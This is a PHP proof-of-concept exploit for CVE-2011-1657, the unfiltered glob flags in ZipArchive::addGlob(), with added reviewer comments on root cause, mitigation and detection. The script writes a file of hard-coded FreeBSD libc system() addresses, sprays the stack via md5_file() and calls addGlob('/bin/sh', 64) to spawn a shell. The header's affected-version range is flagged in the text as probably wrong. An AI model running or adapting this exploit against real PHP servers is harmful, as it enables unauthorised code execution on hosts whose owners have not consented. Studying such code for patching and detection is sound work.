<?php
/* CVE-2011-1657: php <= 3.5.6 ZipArchive::addGlob() missing glob flags filtering
 *   (NOTE(review): the version range as written looks transposed; confirm the
 *   affected releases against the CVE advisory before relying on it.)
 *
 * Lame and JustForFun FreeBSD PoC using GLOB_ALTDIRFUNC glob() flag to pown!
 *
 * (c) 2011 - Clement LECIGNE <clemun at gmail dot com>
 *
 * Reviewer summary (defensive reading of what this script demonstrates):
 *   Root cause: addGlob() forwards its second argument to libc glob() without
 *   masking out flags that the caller should never control; per the header
 *   above, GLOB_ALTDIRFUNC makes glob() use directory callbacks taken from the
 *   glob_t struct, and per the comment at the addGlob() call the script relies
 *   on stale stack contents (left by md5_file()) to fill that struct.
 *   Mitigation: run a PHP build whose addGlob()/glob() masks the flags argument,
 *   and never pass caller-influenced values as addGlob() flags.
 *   Detection: a php worker spawning a shell is anomalous on a web host.
 *   Portability: this is tied to one FreeBSD build (hard-coded libc address);
 *   on any other target it has no reliable effect.
 */
/* Create a file for our md5_file() stack spray.
 */
$system_addr = "\x50\x78\x8d\x28"; /* FreeBSD 8.2-RELEASE system() libc addr — build-specific, not portable */
$own = fopen("owned", "w");          /* return value unchecked: a warning (and a fatal on fwrite) if cwd is not writable */
fwrite($own, str_repeat($system_addr, 4096/4)); /* 1024 copies of the 4-byte value = exactly 4096 bytes */
fclose($own);
/* Fake zip, empty file is a valid zip.
 */
$path = "foo.zip";
unlink($path);                       /* emits a warning when foo.zip does not exist yet (first run) */
fopen($path, "a");                   /* only creates the empty file; the handle is never closed and is released at script end */
$nx=new ZipArchive();
$nx->open($path);                    /* return value unchecked; ZipArchive::open() reports failure via its return value */
/* Lame stack spraying \o/
 */
md5_file("owned");                   /* reads the 4096-byte file; the digest is discarded — only the stack side effect is wanted */
/* Bing. globbuf.gl_opendir() = system()
 */
$nx->addGlob("/bin/sh", 64);         /* the integer 64 is handed straight to glob() as flags — the unfiltered-flags defect this PoC targets */
?>